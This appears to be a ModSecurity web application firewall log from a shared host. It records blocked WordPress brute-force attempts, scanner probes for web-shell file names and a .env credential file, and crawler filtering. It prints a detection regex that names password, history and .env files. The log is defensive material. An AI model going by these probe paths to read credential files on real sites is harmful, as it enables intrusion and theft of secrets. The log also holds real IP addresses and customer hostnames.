[Tue May 26 14:20:21.003317 2026] [security2:error] [pid 606909:tid 607039] [client 202.141.30.10:65281] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVezV0yRtX9qA7aVUVLGAAAAIU"]
[Tue May 26 14:20:21.041888 2026] [security2:error] [pid 606909:tid 607108] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVezF0yRtX9qA7aVUVLDAAAAMo"]
[Tue May 26 14:20:21.501233 2026] [security2:error] [pid 606909:tid 607030] [remote 47.251.53.97:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVezV0yRtX9qA7aVUVLHwAAnXg"]
[Tue May 26 14:20:21.957440 2026] [security2:error] [pid 606909:tid 606964] [remote 54.38.29.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVezV0yRtX9qA7aVUVLLgAAjDY"]
[Tue May 26 14:20:23.495583 2026] [security2:error] [pid 606909:tid 607101] [client 202.141.83.254:53795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVez10yRtX9qA7aVUVLTQAAAMM"]
[Tue May 26 14:20:23.495709 2026] [security2:error] [pid 606909:tid 607101] [client 202.141.83.254:53795] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVez10yRtX9qA7aVUVLTQAAAMM"]
[Tue May 26 14:20:23.742333 2026] [security2:error] [pid 606909:tid 607155] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVez10yRtX9qA7aVUVLSQAAAPk"]
[Tue May 26 14:20:23.877052 2026] [security2:error] [pid 606909:tid 607034] [remote 69.171.234.19:49082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.234.171.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ecosol.plus"] [uri "/esplus/usuarios/registro.php"] [unique_id "ahVez10yRtX9qA7aVUVLVwAAxHw"]
[Tue May 26 14:20:25.672216 2026] [security2:error] [pid 606909:tid 606974] [remote 74.7.241.58:33600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVe0V0yRtX9qA7aVUVLkAAA0EA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:20:25.776814 2026] [security2:error] [pid 606909:tid 607160] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe0V0yRtX9qA7aVUVLhwAAAP4"]
[Tue May 26 14:20:30.057788 2026] [security2:error] [pid 606909:tid 607070] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe1V0yRtX9qA7aVUVL5wAAAKQ"]
[Tue May 26 14:20:30.740775 2026] [security2:error] [pid 606909:tid 607139] [client 161.142.119.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe1l0yRtX9qA7aVUVL9QAAAOk"]
[Tue May 26 14:20:31.813320 2026] [security2:error] [pid 606909:tid 607152] [client 202.141.30.10:65446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVe110yRtX9qA7aVUVMKQAAAPY"]
[Tue May 26 14:20:31.813535 2026] [security2:error] [pid 606909:tid 607152] [client 202.141.30.10:65446] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVe110yRtX9qA7aVUVMKQAAAPY"]
[Tue May 26 14:20:31.848037 2026] [security2:error] [pid 606909:tid 607088] [client 45.148.10.174:39692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.in"] [uri "/.env"] [unique_id "ahVe110yRtX9qA7aVUVMKgAAALY"]
[Tue May 26 14:20:32.102379 2026] [security2:error] [pid 606909:tid 607104] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe110yRtX9qA7aVUVMJQAAAMY"]
[Tue May 26 14:20:32.958194 2026] [security2:error] [pid 606909:tid 607121] [client 45.148.10.174:39754] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVe2F0yRtX9qA7aVUVMUAAAANc"]
[Tue May 26 14:20:33.958161 2026] [security2:error] [pid 606909:tid 607145] [client 202.141.83.254:53805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVe2V0yRtX9qA7aVUVMegAAAO8"]
[Tue May 26 14:20:33.958262 2026] [security2:error] [pid 606909:tid 607145] [client 202.141.83.254:53805] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVe2V0yRtX9qA7aVUVMegAAAO8"]
[Tue May 26 14:20:34.238960 2026] [security2:error] [pid 606909:tid 607120] [client 4.201.75.230:5452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVe2l0yRtX9qA7aVUVMhAAAANY"]
[Tue May 26 14:20:34.422020 2026] [security2:error] [pid 606909:tid 607105] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe2V0yRtX9qA7aVUVMfgAAAMc"]
[Tue May 26 14:20:35.884719 2026] [security2:error] [pid 606909:tid 607128] [client 193.37.33.131:32945] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVe2l0yRtX9qA7aVUVMowAAAN4"]
[Tue May 26 14:20:36.185869 2026] [security2:error] [pid 606909:tid 607100] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe210yRtX9qA7aVUVMvgAAAMI"]
[Tue May 26 14:20:38.327739 2026] [security2:error] [pid 606909:tid 607053] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe3V0yRtX9qA7aVUVM-gAAAJM"]
[Tue May 26 14:20:39.819331 2026] [security2:error] [pid 606909:tid 607162] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe310yRtX9qA7aVUVNHwAAAQA"]
[Tue May 26 14:20:41.050502 2026] [security2:error] [pid 606909:tid 606918] [remote 54.38.29.86:32814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVe4F0yRtX9qA7aVUVNQwABAwg"]
[Tue May 26 14:20:41.721416 2026] [security2:error] [pid 606909:tid 607135] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe4V0yRtX9qA7aVUVNVQAAAOU"]
[Tue May 26 14:20:42.689483 2026] [security2:error] [pid 606909:tid 607079] [client 202.141.30.10:65420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVe4l0yRtX9qA7aVUVNewAAAK0"]
[Tue May 26 14:20:42.689600 2026] [security2:error] [pid 606909:tid 607079] [client 202.141.30.10:65420] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVe4l0yRtX9qA7aVUVNewAAAK0"]
[Tue May 26 14:20:42.794220 2026] [security2:error] [pid 606909:tid 606915] [remote 178.104.164.71:52792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVe4l0yRtX9qA7aVUVNfAAAxwU"]
[Tue May 26 14:20:42.913435 2026] [security2:error] [pid 606909:tid 607070] [client 4.201.75.230:5449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVe4l0yRtX9qA7aVUVNjAAAAKQ"]
[Tue May 26 14:20:44.376704 2026] [security2:error] [pid 606909:tid 607108] [client 202.141.83.254:53835] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVe5F0yRtX9qA7aVUVNqgAAAMo"]
[Tue May 26 14:20:44.376818 2026] [security2:error] [pid 606909:tid 607108] [client 202.141.83.254:53835] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVe5F0yRtX9qA7aVUVNqgAAAMo"]
[Tue May 26 14:20:44.460439 2026] [security2:error] [pid 606909:tid 607125] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe5F0yRtX9qA7aVUVNowAAANs"]
[Tue May 26 14:20:44.758944 2026] [security2:error] [pid 606909:tid 607160] [client 4.201.75.230:5463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVe5F0yRtX9qA7aVUVNtAAAAP4"]
[Tue May 26 14:20:44.940981 2026] [security2:error] [pid 606909:tid 607127] [client 114.119.155.228:22001] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVe5F0yRtX9qA7aVUVNuwAAAN0"], referer: http://haddingtonwines.com/cart?remove_item=fd95ec8df5dbeea25aa8e6c808bad583
[Tue May 26 14:20:46.644876 2026] [security2:error] [pid 606909:tid 607065] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe5l0yRtX9qA7aVUVN3gAAAJ8"]
[Tue May 26 14:20:48.696480 2026] [security2:error] [pid 606909:tid 607118] [client 4.201.75.230:5451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/function/function.php"] [unique_id "ahVe6F0yRtX9qA7aVUVOFwAAANQ"]
[Tue May 26 14:20:49.193788 2026] [security2:error] [pid 606909:tid 607065] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe6F0yRtX9qA7aVUVOGgAAAJ8"]
[Tue May 26 14:20:49.808056 2026] [security2:error] [pid 606909:tid 607077] [client 4.201.75.230:5444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahVe6V0yRtX9qA7aVUVOMAAAAKs"]
[Tue May 26 14:20:50.714445 2026] [security2:error] [pid 606909:tid 607046] [client 4.201.75.230:5446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahVe6l0yRtX9qA7aVUVOQwAAAIw"]
[Tue May 26 14:20:50.836611 2026] [security2:error] [pid 606909:tid 607068] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe6l0yRtX9qA7aVUVOPAAAAKI"]
[Tue May 26 14:20:52.627471 2026] [security2:error] [pid 606909:tid 607157] [client 114.119.128.23:33721] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/project_cat/architecture"] [unique_id "ahVe7F0yRtX9qA7aVUVOiAAAAPs"], referer: https://bhavisharchitects.com/interior-designer-and-architects-firms/see-our-works-architecture-interior-design
[Tue May 26 14:20:52.956505 2026] [security2:error] [pid 606909:tid 607140] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe7F0yRtX9qA7aVUVOgwAAAOo"]
[Tue May 26 14:20:53.437102 2026] [security2:error] [pid 606909:tid 607142] [client 202.141.30.10:35366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVe7V0yRtX9qA7aVUVOoQAAAOw"]
[Tue May 26 14:20:53.437244 2026] [security2:error] [pid 606909:tid 607142] [client 202.141.30.10:35366] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVe7V0yRtX9qA7aVUVOoQAAAOw"]
[Tue May 26 14:20:54.851497 2026] [security2:error] [pid 606909:tid 607111] [client 102.129.75.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe7l0yRtX9qA7aVUVOtAAAAM0"]
[Tue May 26 14:20:54.875974 2026] [security2:error] [pid 606909:tid 607128] [client 202.141.83.254:53971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVe7l0yRtX9qA7aVUVOvgAAAN4"]
[Tue May 26 14:20:54.876175 2026] [security2:error] [pid 606909:tid 607128] [client 202.141.83.254:53971] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVe7l0yRtX9qA7aVUVOvgAAAN4"]
[Tue May 26 14:20:54.971116 2026] [security2:error] [pid 606909:tid 607146] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe7l0yRtX9qA7aVUVOvQAAAPA"]
[Tue May 26 14:20:55.213013 2026] [security2:error] [pid 606909:tid 607079] [client 4.201.75.230:5461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVe710yRtX9qA7aVUVO0QAAAK0"]
[Tue May 26 14:20:55.904309 2026] [security2:error] [pid 606909:tid 607100] [client 74.249.173.207:5378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVe710yRtX9qA7aVUVO5wAAAMI"]
[Tue May 26 14:20:56.147575 2026] [security2:error] [pid 606909:tid 607051] [client 212.18.127.157:28325] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVe8F0yRtX9qA7aVUVO6AAAAJE"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 14:20:56.398526 2026] [security2:error] [pid 606909:tid 607163] [client 4.201.75.230:5440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/cache.php"] [unique_id "ahVe8F0yRtX9qA7aVUVO7AAAAQE"]
[Tue May 26 14:20:56.890882 2026] [security2:error] [pid 606909:tid 607088] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe8F0yRtX9qA7aVUVO7wAAALY"]
[Tue May 26 14:20:57.668613 2026] [security2:error] [pid 606909:tid 607106] [client 74.249.173.207:5383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVe8V0yRtX9qA7aVUVPAwAAAMg"]
[Tue May 26 14:20:57.824179 2026] [security2:error] [pid 606909:tid 607155] [client 185.165.240.73:10407] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVe8V0yRtX9qA7aVUVO_AAAAPk"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 14:20:58.799065 2026] [security2:error] [pid 606909:tid 607142] [client 74.7.241.180:43058] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahVe8l0yRtX9qA7aVUVPKAAAAOw"]
[Tue May 26 14:20:58.954738 2026] [security2:error] [pid 606909:tid 607126] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe8l0yRtX9qA7aVUVPHgAAANw"]
[Tue May 26 14:20:59.645056 2026] [security2:error] [pid 606909:tid 607072] [client 85.208.96.197:44678] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVe810yRtX9qA7aVUVPMwAAAKY"]
[Tue May 26 14:20:59.645203 2026] [security2:error] [pid 606909:tid 607072] [client 85.208.96.197:44678] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVe810yRtX9qA7aVUVPMwAAAKY"]
[Tue May 26 14:20:59.836417 2026] [security2:error] [pid 606909:tid 607060] [client 74.249.173.207:5380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVe810yRtX9qA7aVUVPPAAAAJo"]
